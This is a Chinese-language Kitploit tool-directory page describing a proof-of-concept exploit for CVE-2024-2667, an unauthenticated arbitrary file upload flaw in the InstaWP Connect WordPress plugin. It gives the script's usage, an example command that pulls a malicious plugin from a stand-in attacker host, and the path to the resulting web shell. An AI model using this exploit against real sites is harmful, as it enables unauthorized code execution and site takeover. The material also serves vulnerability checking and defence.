Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-2667-Poc — 针对 CVE-2024-2667 的 PoC 漏洞利用:利用 InstaWP Connect WordPress 插件 REST API 端点中不充分的文件验证,实现自动化任意文件上传与 Shell 访问。 | Kitploit
工具/GitHubGitHub/nxploited/cve-2024-2667-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubnxploited/cve-2024-2667-poc

CVE-2024-2667-Poc

针对 CVE-2024-2667 的 PoC 漏洞利用:利用 InstaWP Connect WordPress 插件 REST API 端点中不充分的文件验证,实现自动化任意文件上传与 Shell 访问。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-2667-Poc 🚀

描述

WordPress 的 InstaWP Connect – 1-click WP Staging & Migration 插件在 0.1.0.22 及更早的所有版本中,因 /wp-json/instawp-connect/v1/config REST API 端点对文件的验证不足而存在任意文件上传漏洞,这使得未经身份验证的攻击者能够上传任意文件。

脚本使用指南 ⚙️

安装依赖

描述详细信息图标
安装所需库使用 pip 安装所需的 Python 库:requests 和 beautifulsoup4。🛠️
安装命令运行:pip install requests beautifulsoup4。📥

运行脚本

漏洞检查

Shell 位置

描述详细信息图标
Shell 路径如果上传成功,可通过以下路径访问 shell:🐚
wp-content/plugins/instawp-connect/shell.php。

用法 -help

root@kitploit:~
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
下载工具
描述详细信息图标
执行脚本使用命令行并携带所需参数运行脚本。🚀
必需参数- -up:插件 URL(例如 http://attacker-domain/malicious-plugin.zip)。
- -u:目标 WordPress URL(例如 http://victim-domain/)。🔧
示例命令python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/📜
描述详细信息图标
版本检查脚本会检查目标插件的 readme.txt 文件以获取版本信息。🔍
存在漏洞的版本如果版本为 <= 0.1.0.22,脚本将输出:The site is vulnerable.⚠️
安全版本如果版本为 > 0.1.0.22,脚本将输出:The site is not vulnerable.✅